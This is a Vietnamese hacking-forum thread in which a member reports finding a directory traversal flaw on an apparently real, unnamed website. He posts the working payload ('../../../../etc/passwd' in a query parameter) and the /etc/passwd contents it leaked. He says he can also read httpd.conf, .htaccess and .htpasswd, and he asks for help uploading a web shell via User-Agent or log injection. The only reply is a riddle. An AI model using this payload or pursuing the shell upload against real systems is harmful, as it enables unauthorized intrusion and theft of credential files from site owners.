banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Giúp em về lỗi Directory Traversal  XML
  [Question]   Giúp em về lỗi Directory Traversal 22/09/2013 00:43:50 (+0700) | #1 | 278512
[Avatar]
duyhauu
Member

[Minus]    0    [Plus]
Joined: 28/07/2010 09:55:34
Messages: 2
Offline
[Profile] [PM]
Chào các a/c trong diễn đàn HVA ạ.

Chả là hôm qua e có đọc bài viết về lỗi này, nên e có tìm được 1 site lỗi dạng đó cụ thể là :
domain.com?bvrrp=../../../../../../../../../../etc/passwd 


Trang web nó không báo lỗi gì cả, nhưng khi "View Page Source" sẽ thấy thông tin file đó :


rootsmilie:0:0:root:/root:/bin/bash
binsmilie:1:1:bin:/bin:/sbin/nologin
daemonsmilie:2:2:daemon:/sbin:/sbin/nologin
admsmilie:3:4:adm:/var/adm:/sbin/nologin
lpsmilie:4:7:lp:/var/spool/lpd:/sbin/nologin
syncsmilie:5:0:sync:/sbin:/bin/sync
shutdownsmilie:6:0:shutdown:/sbin:/sbin/shutdown
haltsmilie:7:0:halt:/sbin:/sbin/halt
mailsmilie:8:12:mail:/var/spool/mail:/sbin/nologin
uucpsmilie:10:14:uucp:/var/spool/uucp:/sbin/nologin
operatorsmilie:11:0:operator:/root:/sbin/nologin
gamessmilie:12:100:games:/usr/games:/sbin/nologin
gophersmilie:13:30:gopher:/var/gopher:/sbin/nologin
ftpsmilie:14:50:FTP User:/var/ftp:/sbin/nologin
nobodysmilie:99:99:Nobody:/:/sbin/nologin
dbussmilie:81:81:System message bus:/:/sbin/nologin
oprofilesmilie:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsasmilie:69:69:virtual console memory owner:/dev:/sbin/nologin
rpcsmilie:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrtsmilie:499:499::/etc/abrt:/sbin/nologin

........và còn nhiều nữa...... 


Do e dùng tools Acunetix 8 nên mới biết đó là lỗi Directory Traversal smilie . Qua tìm hiểu cách up shell vào những site này thì up qua add on User Agent của Fire Fox, e đã thử và thất bại smilie. Nguyên nhân là cái server của e là Apache , không có đường dẫn : /proc/self/environ nên không up shell qua nó được ạ.

Qua bài viết
Code:
/hvaonline/posts/list/36793.html

Em thấy có đề cập đến vấn đề là qua file log, nhưng e tìm suốt mà không thấy nó ở đâu smilie , mặc dù thay
bvrrp=../../../../../../../../../../etc/passwd bằng các file muốn view đều được hết ../etc/passwd, /etc/group, httpd.conf, .htaccess, .htpasswd
.................

Các a/c cho e hỏi là liệu site này e có thể up được shell không ?, nếu up được thì phải làm như thế nào ạ ? mong a chị giúp đỡ e.
Em cảm ơn ạ !
[Up] [Print Copy]
  [Question]   Giúp em về lỗi Directory Traversal 23/09/2013 02:02:39 (+0700) | #2 | 278517
[Avatar]
chiro8x
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]
Có một câu hỏi này, nếu bạn giải đáp nó thì đồng thời bạn cũng giải đáp luôn vấn đề bạn đang gặp phải.

"Có một cây cổ thụ, người ta có thể tính tuổi cây dựa trên số vân sáng tối. Một vân sáng và một vân tối là một năm. Có 432 vân sáng, 431 vân tối. Hỏi ai là người chặt cây ?."
while(1){}
[Up] [Print Copy]
  [Question]   Giúp em về lỗi Directory Traversal 23/09/2013 02:51:04 (+0700) | #3 | 278518
[Avatar]
duyhauu
Member

[Minus]    0    [Plus]
Joined: 28/07/2010 09:55:34
Messages: 2
Offline
[Profile] [PM]

chiro8x wrote:
Có một câu hỏi này, nếu bạn giải đáp nó thì đồng thời bạn cũng giải đáp luôn vấn đề bạn đang gặp phải.

"Có một cây cổ thụ, người ta có thể tính tuổi cây dựa trên số vân sáng tối. Một vân sáng và một vân tối là một năm. Có 432 vân sáng, 431 vân tối. Hỏi ai là người chặt cây ?." 


E không hiểu ý của a lắm ạ, từ vân cây xong lại hỏi là ai chặt ? ngoài con người ra thì ai chặt vào đây dc smilie. cái site này e đặt bnhiu hy vọng vào nó. mong rằng câu trả lời k phải là : bó tay smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|